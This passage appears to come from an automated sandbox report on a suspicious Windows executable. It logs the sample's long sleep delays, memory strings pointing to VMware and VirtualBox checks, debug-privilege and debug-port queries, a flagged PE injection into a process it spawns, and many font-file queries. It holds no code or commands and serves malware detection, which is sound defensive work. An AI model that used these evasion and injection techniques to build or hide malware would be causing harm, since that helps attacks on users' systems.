              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234281s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234172s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -234063s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -233953s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -233844s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -233688s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6068Thread sleep time: -41226s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 6120Thread sleep time: -233547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exe TID: 5040Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 240000Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239871Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239766Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239639Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239532Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239391Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239281Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239164Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238958Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238797Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238619Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238500Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238359Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238218Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238106Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237991Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237842Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237688Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237561Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237427Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237297Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237116Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236984Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236841Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236688Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236537Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236391Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236249Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236141Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236000Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235887Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235766Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235641Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235513Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235391Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235250Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235138Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235028Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234905Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234777Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234657Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234530Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234418Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234281Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234172Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234063Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233953Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233844Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233688Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233547Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeWindow / User API: threadDelayed 9142Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 240000Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239871Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239766Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239639Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239532Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239391Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239281Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 239164Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238958Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238797Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238619Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238500Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238359Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238218Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 238106Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237991Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237842Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237688Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237561Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237427Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237297Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 237116Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236984Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236841Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236688Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236537Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236391Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236249Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236141Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 236000Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235887Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235766Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235641Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235513Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235391Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235250Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235138Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 235028Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234905Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234777Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234657Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234530Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234418Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234281Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234172Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 234063Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233953Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233844Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233688Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 41226Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 233547Jump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeThread delayed: delay time: 60000Jump to behavior
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\TSOFTWARE\Oracle\VirtualBox Guest AdditionsNSYSTEM\ControlSet001\Services\Disk\Enum
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
              Source: PI#53034601506400.exe, 00000000.00000002.328500909.0000000002538000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\PI#53034601506400.exeMemory written: C:\Users\user\Desktop\PI#53034601506400.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeProcess created: C:\Users\user\Desktop\PI#53034601506400.exe C:\Users\user\Desktop\PI#53034601506400.exeJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Users\user\Desktop\PI#53034601506400.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI#53034601506400.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
